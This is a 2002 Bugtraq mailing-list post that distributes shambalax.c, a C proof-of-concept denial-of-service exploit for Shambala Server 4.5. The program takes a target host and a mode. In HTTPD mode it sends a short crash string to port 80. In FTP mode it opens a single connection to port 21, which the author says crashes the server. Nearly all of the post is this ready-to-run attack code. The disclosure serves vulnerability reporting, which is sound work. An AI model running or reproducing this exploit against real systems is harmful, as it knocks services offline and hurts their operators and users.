Exploit for previously reported DoS issues in Shambala Server 4.5
Date: Tue, 09 Jul 2002 10:46:42 +0200
From: Daniel =?ISO-8859-1?Q?Nystr=F6m?= <exce@netwinder.nu>
To: bugtraq@securityfocus.com
Subject: Exploit for previously reported DoS issues in Shambala Server 4.5
--------------040001080208000003030003
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
DoS exploit for previously discussed issues in Shambala Server 4.5.
--
/***********************************
* Daniel NystrЖm, Telhack 026 Inc. *
***********************************/
http://www.SweSec.tk
http://www.telhack.tk
--------------040001080208000003030003
Content-Type: text/plain;
name="shambalax.c"
Content-Transfer-Encoding: 8bit
Content-Disposition: inline;
filename="shambalax.c"
/******** shambalax.c ***********************************************************
* *
* PoC exploit for the DoS in Shambala Server 4.5 *
* as described in Telhack 026 Inc. S.A. #3 (BID:4897). *
* I have also built in a function that exploits another *
* DoS condition found by zillion a long long time ago. *
* Also refined my DoS a little bit by just using one *
* char that mess up Shambala. *
* *
* By: Daniel NystrЖm (excE) <exce@netwinder.nu> *
* *
* *
* Notes: *
* I found that zillion had only been almost right, it *
* is not opening a lot of TCP connection that generates *
* the DoS that he found, it is just one TCP connection, *
* but it certainly has to do with bad connection handling *
* by Shambala. *
* *
* *
* *
* Credits: *
* Zillion <zillion@safemode.org> - for discovering the FTP DoS *
* *
* Greetz: *
* Xenogen <*****@**********.***> - for promising to report any segfaults :) *
* X-Rewt <*****@**********.***> - Cuz he's in my school :P *
* Telhack 026 Inc. crew - STOP phreaking, START doing something more fun :)) *
* *
*********************************************************** shambalax.c ********/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>
int main(int argc, char *argv[])
{
int sockfd;
int port;
int numbytes;
struct sockaddr_in target;
struct hostent *he;
if (argc != 3)
{
fprintf(stderr, "\n-- Shambala Server 4.5 DoS exploit --\n");
fprintf(stderr, "\nUsage: %s <target> <type>", argv[0]);
fprintf(stderr, "\nTypes:");
fprintf(stderr, "\n1 - HTTPD DoS");
fprintf(stderr, "\n2 - FTP DoS\n\n");
exit(1);
}
printf("\n-- Shambala Server 4.5 DoS exploit --\n\n");
printf("-> Starting...\n");
printf("->\n");
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(1);
}
if ((sockfd=socket(AF_INET, SOCK_STREAM,0)) == -1)
{
perror("socket");
exit(1);
}
/* HTTPD DoS */
if(argv[2][0] == '1')
{
port = 80;
target.sin_family = AF_INET;
target.sin_port = htons(port);
target.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(target.sin_zero), 8);
printf("-> Connecting to %s:80...\n", inet_ntoa(target.sin_addr));
printf("->\n");
if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) == -1)
{
perror("connect");
exit(1);
}
printf("-> Sending httpd exploit string!! M4y th3 3v1L Shambala d13!!! :)\n");
printf("->\n");
if(send(sockfd, "!\r\n", 3, 0) == -1)
{
perror("send");
exit(1);
}
close(sockfd);
}
else
/* FTPD DoS */
if(argv[2][0] == '2')
{
port = 21;
target.sin_family = AF_INET;
target.sin_port = htons(port);
target.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(target.sin_zero), 8);
printf("-> Making a TCP connection (!which crashes server!) to %s:21...\n", inet_ntoa(target.sin_addr));
printf("->\n");
if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) == -1)
{
perror("connect");
exit(1);
}
close(sockfd);
}
else
{
fprintf(stderr, "\n\nError: Bad type definition (use 1 or 2 for <type>).\n\n");
exit(1);
}
printf("-> Exploit finished nicely. %s's Shambala is probably dead by now.\n\n", argv[1]);
}
/* EOF - Shambala Server 4.5 DoS exploit */
/* Daniel NystrЖm (excE) <exce@netwinder.nu> */
--------------040001080208000003030003--